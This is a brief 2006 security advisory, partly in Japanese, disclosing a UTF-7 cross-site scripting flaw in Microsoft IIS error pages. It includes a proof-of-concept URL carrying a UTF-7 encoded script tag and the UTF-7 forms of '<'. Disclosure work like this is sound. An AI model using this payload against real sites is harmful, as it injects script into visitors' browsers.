Title: |
Microsoft Internet Information Services UTF-7 XSS Vulnerability |
Date: |
1 October 2006 (Last modified: 3 October 2006) |
Author: |
Eiji James Yoshida [ptrs-ejy@bp.iij4u.or.jp] |
Vulnerable: |
Internet Information Services |
Bugtraq ID: |
|
Patch: |
|
Overview: |
IIS には入力された UTF-7 エンコーディングの文字列を、そのままエラー画面で表示してしまう問題があります。 もしインターネットエクスプローラのエンコードで自動選択が設定されている場合、エラー画面の文字列によっては UTF-7 エンコーディングのスクリプトが正しく処理され、インターネットエクスプローラで悪意のあるスクリプトが実行されてしまうことがあります。 |
Proof of concept: |
http://VulnerableSite/+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-.htw?CiWebHitsFile=/iisstart.asp&CiRestriction='' UTF-7("<") = +ADw-, +ADx-, +ADy-, +ADz- |
Vendor status: |
IPA/ISEC
には、2005 年 12 月 27 日に報告しました。 |
Similar vulnerability: |
XSS
vulnerabilities in Google.com |
Copyright(c) 2006 Eiji James Yoshida. All rights reserved